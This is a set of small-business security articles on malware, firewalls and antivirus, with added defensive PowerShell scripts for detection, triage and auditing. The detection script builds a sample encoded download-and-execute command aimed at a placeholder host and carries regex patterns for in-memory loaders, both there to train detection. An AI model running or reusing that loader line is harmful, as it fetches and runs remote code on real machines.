Introduction to Malicious Software

Article (PSA‑0003) – Updated 2025

Even after a decade of rapid growth, malware remains the primary vector for data theft, ransomware, and large‑scale cyber‑crime. Recent industry reports illustrate the scale:

  • Symantec (Broadcom) 2024 Threat Report – > 1 billion new malicious files detected in the last 12 months, a 12 % increase over 2023.
  • Kaspersky 2024 Security Bulletin – ≈ 3 million malware‑related alerts per day, with a 45 % rise in ransomware attempts.
  • Microsoft 2024 Digital Threat Landscape – Cryptojacking incidents grew 87 % YoY, and “file‑less” attacks now account for ≈ 30 % of all detections on Windows platforms.

All of these numbers point to a single truth: malware is a money‑making industry. Attackers steal personal data and financial credentials, then leverage compromised machines to launch further attacks, sell access, or extort victims.

What Is Malware?

Malware = malicious software – a blanket term for any program that infiltrates a system without the user’s consent. It includes, but is not limited to, viruses, spyware, adware, ransomware, botnets, cryptominers, and file‑less payloads.

Common infection vectors (still relevant)

  • Infected email attachments or malicious links in phishing messages.
  • Compromised USB/thumb drives and other removable media.
  • Downloads from untrusted websites or pirated software.
  • Drive‑by downloads via compromised legitimate sites (malvertising).
  • Supply‑chain compromises – malicious code injected into trusted software updates (e.g., the SolarWinds Orion and 3CX desktop‑app incidents).

Malware Categories – 2025 Edition

  • Viruses – Self‑replicating code that can corrupt files and degrade system performance.
  • Spyware / Keyloggers – Record user input, screenshots, or system activity to steal credentials.
  • Adware – Serve unwanted advertisements, often bundled with free software.
  • Scareware – Pretend to be a legitimate security product, coercing users into paying for fake fixes.
  • Ransomware – Encrypt files and demand payment; modern variants (e.g., LockBit, Hive) add “double‑extortion” – stealing data first and threatening to publish it if the ransom is not paid.
  • Botnets – Networks of compromised devices used for spam, DDoS attacks, or credential‑stuffing.
  • Cryptominers (Cryptojacking) – Hijack CPU/GPU cycles to mine cryptocurrency without the user’s knowledge.
  • File‑less (Living‑off‑the‑Land) malware – Run the payload in memory using tools already on the system (PowerShell, WMI, mshta, rundll32, regsvr32), often as the first stage of a post‑exploitation framework such as Cobalt Strike. Little or nothing is written to disk as an executable (persistence may live in the registry or a WMI event subscription), so file‑signature AV has little to match on and detection has to come from process, script and behaviour telemetry.
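Because file‑less tradecraft leaves almost nothing for a file scanner, the practical detection surface is the process‑creation log. The following is an added example (not code from the PSA article) that scores PowerShell launches for the indicators described above: a suspicious parent process, an encoded command (decoded so the analyst can read it), stealth switches, in‑memory download primitives and WMI use. The `$Events` array is constructed sample data shaped like the Parent/CommandLine fields of Sysmon Event ID 1 or Security Event 4688; in practice you would feed the function from Get‑WinEvent or a SIEM export. The hostnames and the `http://example.test/stage2` URL are placeholders.

```powershell
# Added example, not code from the PSA article: triage process-creation records
# for living-off-the-land PowerShell. $Events is constructed sample data.

# Build the encoded payload the way a loader would (UTF-16LE, then base64) so the
# sample is realistic without hand-typing a base64 blob.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/stage2')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

$Events = @(
    [pscustomobject]@{ Host='WS01';  Parent='winword.exe';  CommandLine="powershell.exe -nop -w hidden -enc $encoded" }
    [pscustomobject]@{ Host='WS02';  Parent='explorer.exe'; CommandLine='powershell.exe -File C:\Scripts\nightly-backup.ps1' }
    [pscustomobject]@{ Host='SRV01'; Parent='services.exe'; CommandLine='powershell.exe -ExecutionPolicy Bypass -Command "Get-Service | Out-File C:\Temp\svc.txt"' }
    [pscustomobject]@{ Host='WS03';  Parent='wmiprvse.exe'; CommandLine='powershell.exe -w hidden -c "Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name=''upd''}"' }
)

function Test-LotLPowerShell {
    param([Parameter(Mandatory)] $Event)
    $reasons = @()
    $cmd = $Event.CommandLine

    # Office, script hosts and mshta launching PowerShell is the classic macro-to-memory chain.
    if ($Event.Parent -match '^(winword|excel|powerpnt|outlook|mshta|wscript|cscript)\.exe$') {
        $reasons += "spawned by $($Event.Parent)"
    }
    # Encoded commands hide the payload from casual log review: decode it and keep scanning the result.
    if ($cmd -match '\s-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        try {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
            $reasons += "encoded command decodes to: $decoded"
            $cmd += " $decoded"
        } catch { $reasons += 'encoded command present but not valid base64' }
    }
    # Switches whose main purpose is to avoid being noticed.
    if ($cmd -match '-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-noprofile\b') {
        $reasons += 'stealth switches'
    }
    # Download-and-run-in-memory primitives: nothing touches disk, so file signatures never fire.
    if ($cmd -match 'downloadstring|downloadfile|invoke-expression|\bIEX\b|invoke-webrequest|Net\.WebClient') {
        $reasons += 'in-memory download/execute primitive'
    }
    # WMI event subscriptions survive reboots without an executable on disk.
    if ($cmd -match '__EventFilter|CommandLineEventConsumer|root\\subscription|Invoke-WmiMethod|Invoke-CimMethod') {
        $reasons += 'WMI execution or persistence'
    }
    # One indicator alone is routine admin noise (-ExecutionPolicy Bypass in a scheduled task);
    # two or more together is worth a ticket.
    [pscustomobject]@{
        Host        = $Event.Host
        Suspicious  = $reasons.Count -ge 2
        Reasons     = $reasons -join '; '
        CommandLine = $Event.CommandLine
    }
}

$Events | ForEach-Object { Test-LotLPowerShell $_ } | Where-Object Suspicious | Format-List
```

On the sample data the WS01 (Word spawning an encoded, hidden, download‑and‑execute command) and WS03 (hidden window plus a WMI event filter) records are flagged; the SRV01 record, which uses only `-ExecutionPolicy Bypass`, scores one indicator and is left alone, which is the threshold choice that keeps the rule from drowning in scheduled‑task noise.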

Do You Need to Worry About Malware?

Yes – both home users and businesses are prime targets. A breach can lead to:

  • Loss or theft of personal photos, family videos, or critical business documents.
  • Financial liability when customer data (PCI, PHI, PII) is exposed.
  • Operational downtime that costs the average small business ≈ $200 k per incident (National Cybersecurity Center, 2024).
  • Ransom payments (average ≈ $300 k in 2024) and the associated loss of trust.

How to Protect Yourself – Updated Best Practices (2025)

  1. Keep the operating system and all software patched. Enable automatic updates wherever possible.
  2. Use a reputable, actively‑maintained antivirus/antispyware solution. Choose products that combine signature‑based detection with AI/behavioral analysis (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone, SentinelOne).
  3. Enable a host‑based firewall. Windows Defender Firewall or macOS Application Firewall should be on with default “block inbound unless requested” rules.
  4. Employ multi‑factor authentication (MFA) on all cloud and privileged accounts.
  5. Back up data using the 3‑2‑1‑0 rule: three copies, on two different media, one of them off‑site, with zero errors on a test restore. Test restores quarterly and keep at least one copy immutable (or offline) so ransomware cannot encrypt it too.
  6. Educate users. Phishing simulations, safe‑browsing habits, and a “don’t open unknown attachments” policy reduce the human attack surface.
  7. Limit user privileges. Run daily work as a standard user; reserve admin rights for IT staff only.
  8. Use email and web filtering solutions. They block known malicious links, attachments, and exploit kits before they reach the endpoint.
  9. Deploy endpoint detection & response (EDR) for real‑time monitoring of suspicious behavior, especially to catch file‑less attacks.
  10. Monitor network traffic. Intrusion detection/prevention systems (IDS/IPS) and protective‑DNS resolvers that refuse to resolve known‑malicious domains (e.g., Quad9, Cloudflare 1.1.1.1 for Families) add another layer of defense.

What to Do If You Suspect an Infection

  1. Disconnect from the network. Disable Wi‑Fi/Ethernet to stop further spread and cut any command‑and‑control channel. In a business, tell IT before you power the machine off: running processes and memory are evidence that a reboot destroys.
  2. Run a full system scan with up‑to‑date AV/EDR definitions (not just a quick or real‑time scan). If the tool cannot update while the machine is offline, use a scanner that boots outside the installed OS (e.g., Microsoft Defender Offline or a vendor rescue disk); this also sidesteps malware that hides from the running system.
  3. Follow the remediation steps provided by the security tool (quarantine, delete, or repair).
  4. Reboot into Safe Mode (Windows) or Recovery mode (macOS) if the malware persists. Treat this as a troubleshooting step, not a guarantee: some ransomware families deliberately run from Safe Mode.
  5. Change passwords from a clean device, especially for email, banking, and any admin accounts.
  6. Restore from a verified backup if files were encrypted or corrupted. If you cannot prove the infection is gone, rebuild the OS from known‑good media first and restore data only.
  7. Contact a professional if you cannot fully remove the infection or if ransomware demands payment. Paying does not guarantee decryption and often fuels the criminal ecosystem.
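The steps above are the home‑user version. On a business workstation the same procedure is worth scripting so that the volatile evidence is captured before the network is cut and before anyone reboots. The following is an added example (not code from the PSA article): it writes process command lines, live TCP connections and the common persistence points (scheduled tasks, Run keys, WMI event subscriptions) to a folder, hashes the collection, and only then downs the adapters. It assumes Windows 10/11 and an elevated PowerShell prompt; `$OutDir` is an assumed location, and should point at removable media if the disk is about to be wiped.

```powershell
# Added example, not code from the PSA article: capture the volatile evidence that a
# reboot or reimage destroys, then cut the host off the network.
function Invoke-TriageAndIsolate {
    param(
        [string]$OutDir = "C:\IR-$env:COMPUTERNAME-$(Get-Date -Format 'yyyyMMdd-HHmm')",
        [switch]$Isolate
    )
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

    # 1. Processes with command lines. Get-Process drops the command line; the CIM
    #    class keeps it, and that is where file-less launches (-enc, -w hidden) show up.
    Get-CimInstance Win32_Process |
        Select-Object ProcessId, ParentProcessId, Name, CommandLine, CreationDate |
        Export-Csv (Join-Path $OutDir 'processes.csv') -NoTypeInformation

    # 2. Live TCP connections tied to the owning PID: a C2 channel, if one exists, is here.
    Get-NetTCPConnection |
        Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess |
        Export-Csv (Join-Path $OutDir 'tcp.csv') -NoTypeInformation

    # 3. Persistence points: scheduled tasks, Run keys, WMI event subscriptions.
    Get-ScheduledTask | Where-Object State -ne 'Disabled' |
        Select-Object TaskName, TaskPath,
            @{ n = 'Action'; e = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' | ' } } |
        Export-Csv (Join-Path $OutDir 'tasks.csv') -NoTypeInformation
    foreach ($key in 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
                     'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run') {
        if (Test-Path $key) { Get-ItemProperty $key | Out-File (Join-Path $OutDir 'runkeys.txt') -Append }
    }
    foreach ($class in '__EventFilter', '__EventConsumer', '__FilterToConsumerBinding') {
        Get-CimInstance -Namespace root\subscription -ClassName $class -ErrorAction SilentlyContinue |
            Out-File (Join-Path $OutDir "wmi-$class.txt")
    }

    # 4. Hash everything collected so later tampering with the evidence is detectable.
    Get-ChildItem $OutDir -File | Where-Object Name -ne 'manifest.csv' |
        Get-FileHash -Algorithm SHA256 | Select-Object Path, Hash |
        Export-Csv (Join-Path $OutDir 'manifest.csv') -NoTypeInformation

    # 5. Only now isolate: down the adapters, and block both directions as a fallback
    #    in case an adapter comes back. This also cuts off remote management tools.
    if ($Isolate) {
        Get-NetAdapter | Where-Object Status -eq 'Up' | Disable-NetAdapter -Confirm:$false
        Set-NetFirewallProfile -All -DefaultInboundAction Block -DefaultOutboundAction Block
    }
    "Triage written to $OutDir"
}

# Usage: Invoke-TriageAndIsolate -Isolate
```

Run it without `-Isolate` first if an EDR agent is already isolating the host for you; the outbound‑block fallback will otherwise sever the agent's own channel, and the manifest is what lets you show later that the collected files were not altered between triage and analysis.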

Next Up

In the next article we’ll dive into “How Antivirus and Antispyware Work” and what to look for when choosing a solution.

Need Assistance?

If you suspect your computer is infected or you want a professional assessment of your security posture, call PSA Computer Services at (707) 506‑6802. We’ll help you clean the infection, harden your defenses, and get you back to work safely.

When to Upgrade Your Security – Four Key Considerations

Article (PSA‑0002‑C)

Below is a plain‑language breakdown of the four situations that typically justify moving beyond a basic home‑router firewall to a more capable solution such as a commercial next‑generation firewall (NGFW), unified‑threat‑management platform, or a managed security service.


1️⃣ You run a small business with multiple endpoints and need centralized management

  • What it means – You have 5 – 20 devices (PCs, laptops, printers, VoIP phones, servers) spread across one or more locations.
  • Why a basic firewall falls short – A consumer router knows nothing about the endpoints behind it, so the host firewall, antivirus and update settings on each device are configured by hand and drift apart over time, leaving some machines unpatched or with ports open to the Internet.
  • What you need from a new solution
    • A single management console (cloud‑based or on‑prem) that can push policies, updates, and patches to every endpoint.
    • Policy templates that apply the same rule set to all devices automatically.
    • Device‑aware logging that ties every event to a hostname, MAC address, or user for easy forensics.

2️⃣ Ransomware or phishing attacks are a frequent threat in your industry

  • What it means – Malicious PDFs, Office documents, or links that deliver ransomware; fake login pages that harvest credentials.
  • Why a simple firewall can’t stop it – Basic NAT/packet filtering looks only at IP addresses and ports; it cannot inspect file payloads, and a phishing site served over HTTPS on port 443 looks exactly like any other website.
  • What you need from a more robust platform
    • Content‑inspection and sandboxing – unknown files are detonated in an isolated VM and the verdict is applied before the file is delivered.
    • URL and web‑reputation filtering to block known phishing domains in real time.
    • Network segmentation/micro‑segmentation so an infected workstation can’t reach every other device.
    • EDR integration to stop ransomware processes on the endpoint and auto‑rollback changes.

3️⃣ You require application‑aware filtering, IDS/IPS, or secure remote‑access VPNs

  • What it means
    • Allow Zoom video but block Zoom file‑sharing.
    • Detect and block known exploit attempts (e.g., EternalBlue).
    • Provide encrypted, MFA‑protected VPN tunnels for remote staff.
  • Why standard NAT routers can’t deliver
    • Home routers only see TCP/UDP ports – they can’t differentiate between applications that share the same port.
    • No built‑in IDS/IPS signatures, so exploits go unnoticed.
    • VPN support is often limited to PPTP (whose MS‑CHAPv2 authentication is broken and should not be used) or L2TP/IPsec with a single shared secret, with no MFA and no split‑tunnel control.
  • What a modern NGFW (or complementary appliance) offers
    • App‑ID/DPI – precise, per‑application policies (allow, limit, or block).
    • Signature‑based IPS plus behavioral analytics, which gives some coverage of exploits that have no signature yet.
    • Modern SSL/TLS or IPsec VPN with MFA, client certificates, and detailed session logging.
    • Optional ZTNA layer for identity‑based, context‑aware access.

4️⃣ You must comply with regulations (HIPAA, PCI‑DSS, GDPR) that mandate specific security controls

  • HIPAA – audit logs, encryption, role‑based access for ePHI
    • How a basic firewall fails: No immutable logs, no enforced TLS for internal traffic, no RBAC for rule changes.
    • Required capabilities:
      • Detailed, tamper‑proof audit logging (forwarded to a SIEM or immutable storage).
      • TLS/SSL inspection and encryption enforcement for any traffic containing PHI.
      • RBAC so only authorized staff can modify firewall policies.
  • PCI‑DSS – segmentation, IDS/IPS, strict firewall configuration
    • How a basic firewall fails: No VLAN‑based segmentation, no IDS/IPS, and no change‑management logs.
    • Required capabilities:
      • Network segmentation (separate CHD zone) with firewall rules that isolate card‑holder data.
      • Built‑in IDS/IPS to detect attacks against payment‑card servers.
      • Change‑management logging for every rule alteration.
  • GDPR – data‑loss prevention, breach‑notification readiness, encryption
    • How a basic firewall fails: No outbound data‑filtering, no guaranteed encryption, limited visibility for breach forensics.
    • Required capabilities:
      • DLP or outbound filtering to prevent accidental export of personal data.
      • Enforced TLS for all traffic that could carry EU personal data.
      • Comprehensive logging to meet the 72‑hour breach‑notification window.

How to Act on These Considerations

  • Multiple devices? Deploy a centralized endpoint‑protection platform (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone) and pair it with a lightweight NGFW (FortiGate 60F, Palo Alto PA‑220).
  • Ransomware/phishing frequent? Add sandboxing, URL filtering, and network segmentation; enable EDR on all endpoints.
  • Need app‑aware control, IDS/IPS, VPN? Choose an NGFW that bundles those services or combine a dedicated VPN concentrator with a separate IDS/IPS sensor.
  • Regulatory compliance required? No firewall is “HIPAA‑certified”; check instead that the appliance supports the controls the standard actually requires and that the vendor publishes PCI‑DSS/HIPAA deployment guidance. Enable immutable logging, TLS inspection where your policy allows it, and RBAC. Consider a managed security service that handles audit‑ready reporting.

Need a Tailored Recommendation?

If any of the four triggers above sound familiar, it’s time to move beyond a consumer‑grade router. PSA Computer Services can evaluate your environment, recommend a solution that fits your budget, and handle the deployment so you can focus on your business.

Call us today at (707) 506‑6802 for an assessment and a roadmap to a more secure network.

Security, Is More Better?

Article (PSA‑0002)

Security requirements vary by how a computer is used. For a quick assessment you can split the environment into two categories:

  • Online (Internet‑connected) devices – need real‑time threat detection and a firewall.
  • Offline (stand‑alone) devices – may need fewer safeguards, but still require some protection if they ever exchange media with other systems.

1️⃣ Online Devices – Core Requirements

Antivirus / Antimalware

A modern, licensed solution that provides both **real‑time** and **scheduled** scanning is essential.

  • Real‑time scanning – Monitors files as they are created, downloaded, or executed and blocks known threats instantly.
  • Scheduled scanning – Performs a deep scan of the entire drive (or selected folders) on a regular basis (daily, weekly, or monthly) to catch dormant or missed malware.

Built‑in options (2025)

  • Windows 10/11 – Microsoft Defender Antivirus – Free, always‑on, with cloud‑delivered protection, and centrally manageable via Microsoft Intune (formerly Endpoint Manager).
  • macOS – XProtect + Gatekeeper – Native malware detection plus notarization checks for downloaded apps.
  • Linux – ClamAV for on‑demand scanning, or a commercial EDR agent (Microsoft Defender, SentinelOne and CrowdStrike all ship Linux agents) – Useful for servers or workstations that run Linux.

When to consider a third‑party solution

If you need additional features such as ransomware‑specific protection, web‑filtering, or centralized reporting for multiple endpoints, look at reputable vendors like Bitdefender GravityZone, SentinelOne, or ESET Endpoint Security.

Firewall

A firewall controls inbound and outbound traffic based on a set of rules. Two layers are common:

  • Software firewall – Built into the OS (Windows Defender Firewall, macOS Application Firewall, Linux UFW/nftables). It blocks unsolicited inbound connections and can restrict outbound traffic.
  • Hardware firewall – The router or a dedicated appliance (e.g., Ubiquiti EdgeRouter, Cisco Meraki, or a commercial NGFW – Next‑Generation Firewall). Its stateful filter drops unsolicited inbound connections for the whole LAN, and NAT hides the internal addressing. Note that NAT by itself is not a security control; the filtering rules are.

For most home users and small businesses the combination of the OS firewall plus the router’s stateful packet filter is an adequate baseline.

2️⃣ Offline (Never‑Connected) Devices – What to Consider

If a computer truly never touches the Internet and never receives files from another network, you can forgo a full‑time antivirus program. However, keep these points in mind:

  • Even removable media (USB sticks, external HDDs) can carry malware. Scan any media before it is introduced to an offline system.
  • Run an on‑demand scan periodically from trusted boot media (e.g., Microsoft Defender Offline or a vendor rescue disk), so the scanner does not depend on the possibly compromised installed OS.
  • Maintain a strict air‑gap policy: keep the device physically separated and disable any wireless adapters.

Why One Security Suite Is Usually Enough

Running multiple antivirus products on the same machine creates more problems than it solves. The most common issues are:

  1. RAM and CPU contention – Each engine hooks every file operation and holds its own signatures in memory. Under memory pressure the OS pages to disk, and every file open is scanned twice, causing severe slow‑downs.
  2. Software conflicts – Two real‑time scanners can flag each other’s activity as malicious, leading to endless alerts and potential system instability.
  3. Quarantine of critical files – One product may mistakenly quarantine the other’s core components, leaving both programs corrupted.
  4. Administrative overhead – Managing multiple licences, updates, and alert streams is time‑consuming and costly.

For the vast majority of users, **one up‑to‑date antivirus/antispyware product plus a properly configured firewall** provides comprehensive protection.

Practical Checklist – Get Secure in Minutes

  • Enable the built‑in OS firewall. Verify that inbound connections are blocked unless you explicitly allow them.
  • Install a reputable antivirus. If you’re on Windows 10/11, make sure Microsoft Defender is turned on and receiving updates.
  • Schedule a weekly full scan. Set the scan for off‑hours to avoid interrupting work.
  • Keep the system patched. Enable automatic OS updates and apply vendor patches for all installed software.
  • Use strong, unique passwords and enable multi‑factor authentication (MFA) on all cloud accounts.
  • Back up your data. Apply the 3‑2‑1‑0 rule (see PSA‑0005) and test restores quarterly.
  • Limit admin privileges. Operate daily tasks as a standard user; reserve Administrator rights for installs and system changes.
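Most of this checklist, and the longer best‑practice list in the malware article (patching, antivirus, host firewall, scheduled scans, least privilege), can be verified from the machine itself. The following is an added example (not code from the PSA articles): it audits those items on Windows 10/11 with Microsoft Defender as the active antivirus and, with `-Fix`, corrects the ones the OS can set on its own. It assumes an elevated PowerShell prompt. MFA and backups live outside the host and still need a manual check; Controlled Folder Access is turned on in audit mode only, because enforcing it before allow‑listing your applications breaks programs that write to Documents.

```powershell
# Added example, not code from the PSA articles: audit the checklist items the OS can
# report on and, with -Fix, correct the ones it can set itself.
function Test-SecurityBaseline {
    param([switch]$Fix)
    $findings = @()

    # Firewall: every profile on, inbound blocked unless a rule allows it.
    foreach ($p in Get-NetFirewallProfile) {
        if (-not $p.Enabled -or $p.DefaultInboundAction -ne 'Block') {
            $findings += "Firewall profile $($p.Name): Enabled=$($p.Enabled), DefaultInbound=$($p.DefaultInboundAction)"
            if ($Fix) { Set-NetFirewallProfile -Name $p.Name -Enabled True -DefaultInboundAction Block }
        }
    }

    # Antivirus: real-time protection on, signatures fresh, settings tamper-protected.
    $status = Get-MpComputerStatus
    if (-not $status.RealTimeProtectionEnabled) { $findings += 'Defender real-time protection is off' }
    if ($status.AntivirusSignatureAge -gt 3)    { $findings += "Defender signatures are $($status.AntivirusSignatureAge) days old" }
    if (-not $status.IsTamperProtected)         { $findings += 'Defender tamper protection is off (turn it on in Windows Security)' }

    # Scheduled scan: a weekly full scan in off-hours. ScanScheduleDay 8 means "never",
    # ScanParameters 1 is a quick scan and 2 a full scan.
    $pref = Get-MpPreference
    if ($pref.ScanScheduleDay -eq 8 -or $pref.ScanParameters -ne 2) {
        $findings += 'No weekly full scan is scheduled'
        if ($Fix) { Set-MpPreference -ScanParameters FullScan -ScanScheduleDay Sunday -ScanScheduleTime 02:00:00 }
    }

    # Ransomware: Controlled Folder Access. Audit mode first; enforce once known apps are allow-listed.
    if ($pref.EnableControlledFolderAccess -eq 0) {
        $findings += 'Controlled Folder Access is disabled'
        if ($Fix) { Set-MpPreference -EnableControlledFolderAccess AuditMode }
    }

    # Patching: automatic updates not disabled by policy, and something installed recently.
    $au = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -ErrorAction SilentlyContinue
    if ($au.NoAutoUpdate -eq 1) { $findings += 'Automatic Windows Update is disabled by policy' }
    try {
        $last = (New-Object -ComObject Microsoft.Update.AutoUpdate).Results.LastInstallationSuccessDate
        if ($last -lt (Get-Date).AddDays(-45)) { $findings += "Last successful update install was $last" }
    } catch { $findings += 'Could not read Windows Update history' }

    # Least privilege: report who holds local admin so day-to-day accounts can be demoted.
    $admins = (Get-LocalGroupMember -Group Administrators).Name

    [pscustomobject]@{
        Computer    = $env:COMPUTERNAME
        Findings    = $findings
        LocalAdmins = $admins
        Pass        = $findings.Count -eq 0
    }
}

# Usage: Test-SecurityBaseline | Format-List     (add -Fix to apply the firewall and Defender corrections)
```

The `LocalAdmins` list is reported rather than judged because the right membership depends on the site; the goal from the checklist is that the account people log in with every day is not on it.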

When to Upgrade Your Protection

Consider a more advanced solution if any of the following apply:

  • You run a small business with multiple endpoints and need centralized management.
  • Ransomware or phishing attacks are a frequent threat in your industry.
  • You require application‑aware filtering, IDS/IPS, or secure remote‑access VPNs.
  • You must comply with regulations (HIPAA, PCI‑DSS, GDPR) that mandate specific security controls.

Need Professional Help?

If you’re unsure about the right antivirus, firewall configuration, or overall security posture for your home or business, call PSA Computer Services at (707) 506‑6802. We’ll perform a quick health check, recommend a solution that fits your budget, and set everything up so you can work safely.